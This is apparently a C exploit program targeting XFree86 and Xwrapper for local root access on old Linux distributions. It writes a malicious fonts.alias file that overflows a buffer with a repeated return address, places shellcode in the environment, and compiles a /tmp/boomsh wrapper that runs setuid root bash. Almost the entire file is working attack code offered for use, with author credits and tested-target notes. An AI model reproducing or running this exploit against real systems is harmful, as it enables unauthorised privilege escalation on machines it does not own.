/* xfree86 juarez tested on: slackware 9.1, 8.0 redhat 9 gentoo 1.4 enz00@angrypacket.com pr0pz to ap hex0rz for testing!@# */ #include #include #define BUF 1121 /* chmod/chown /tmp/boomsh - ripped from TESO */ char shellcode[]= "\x31\xc0\xb0\x46\xbb\xff\xff\xff\xff\x31\xc9\xcd\x80\xeb" "\x2a\x90\x90\x90\x90\x5e\x89\xf3\xff\x03\xff\x43\x04\x31" "\xc0\x88\x43\x0b\x31\xc0\xb0\xb6\x31\xc9\x31\xd2\xcd\x80" "\x31\xc0\xb0\x0f\x66\xb9\xed\x0d\xcd\x80\x31\xc0\x40\xcd" "\x80\xe8\xd5\xff\xff\xff\x2e\x74\x6d\x70\x2e\x62\x6f\x6f" "\x6d\x73\x68\x2e"; int main(int argc, char *argv[]) { char *env[2] = {shellcode,NULL}; int i; long ret,*buffaddr; char *buffer,*pwd; char *boomsh = "int main(){setuid(0);setgid(0);system(\"/bin/bash\");}\n"; char *xf; char path[20] = "/usr/X11R6/bin/"; char all[20]; FILE *blah; pwd = getenv("PWD"); buffer = malloc(BUF); strcpy(all,path); if(argc < 2){ fprintf(stderr," -- XFree86 c0dez --\n"); fprintf(stderr," enz00@angrypacket.com\n\n"); fprintf(stderr,"Usage:%s \n",argv[0]); fprintf(stderr,"Targets: (0) XFree86\n \t (1) Xwrapper\n"); exit(0); } if(strcmp(argv[1],"1") ==0){ xf = "Xwrapper"; ret = 0xbffffffa - strlen(shellcode) - strlen(xf); strcat(all,xf); }else{ xf = "XFree86"; strcat(all,xf); ret = 0xbffffffa - strlen(shellcode) - strlen(all); } /* create /tmp/boomsh */ blah = fopen("/tmp/boomsh.c","w"); fprintf(blah,"%s",boomsh); fclose(blah); system("/usr/bin/gcc /tmp/boomsh.c -o /tmp/boomsh"); /* setup fonts.dir */ blah = fopen("./fonts.dir","w"); fprintf(blah,"1\nword.bdf -misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1"); fclose(blah); /* setup fonts.alias */ memset(buffer,'0',1024); buffaddr = (long *)(buffer+1024); for(i=0;i < 96;i+=4){ *(buffaddr++) = ret; } strncpy(buffaddr,"\n",1); /* write buffer to fonts.alias */ blah = fopen("./fonts.alias","w"); fprintf(blah,"%s",buffer); fclose(blah); free(buffer); // call program with our buffer as env execle(all,xf,":1","-fp",pwd,0,env); return 0; }